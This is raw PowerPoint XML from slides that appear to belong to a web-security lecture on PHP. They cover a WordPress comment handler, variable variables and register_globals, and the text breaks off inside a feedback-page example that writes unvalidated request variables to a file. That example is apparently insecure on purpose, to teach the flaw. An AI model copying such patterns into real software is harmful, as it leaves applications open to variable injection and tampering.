            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	header('Allow: POST');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	header('HTTP/1.1 405 Method Not Allowed');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	header('Content-Type: text/plain');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	exit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_post_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_post_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>']) ? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) $_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_post_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'] : 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$post = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_post_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if ( empty( $post-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	/**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 * Fires when a comment is attempted on a post that does not exist.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 * @since 1.5.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 * @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_post_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Post ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>do_action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>( '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_id_not_found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>comment_post_ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	exit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get_post_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>() will get the parent status for attachments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$status = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get_post_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($post);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>status_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>get_post_status_object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($status);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6115941"/>
            <a:ext cx="8229600" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>-comments-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>post.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4894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9" end="1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0" end="2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5393864"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="362877"/>
          <a:ext cx="8229600" cy="576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436547" y="1154590"/>
            <a:ext cx="2235492" cy="16689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5515471" y="2833991"/>
            <a:ext cx="2235492" cy="2896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631789" y="3689641"/>
            <a:ext cx="1883682" cy="21462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548697" y="2949858"/>
            <a:ext cx="2083092" cy="21462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701097" y="1317893"/>
            <a:ext cx="2235492" cy="16319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22825" y="244751"/>
            <a:ext cx="2235492" cy="118274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5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Variable Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$a = 'hello';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$$a = 'world';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "$a $hello";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "$a ${$a}";</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6115941"/>
            <a:ext cx="8229600" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>php.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/manual/en/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>language.variables.variable.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18949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PHP – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"To register the EGPCS (Environment, GET, POST, Cookie, Server) variables as global variables."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP will automatically inject variables into your script based on input from the HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP request variable name is the PHP variable name and the value is the PHP variable's value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default enabled until 4.2.0 (April 2002)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4128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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;head&gt; &lt;title&gt;Feedback Page&lt;/title&gt;&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;h1&gt;Feedback Page&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      if ($name &amp;&amp; $comment) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        $file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_feedback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "a");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($file, "$name:$comment\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        echo "Feedback submitted\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
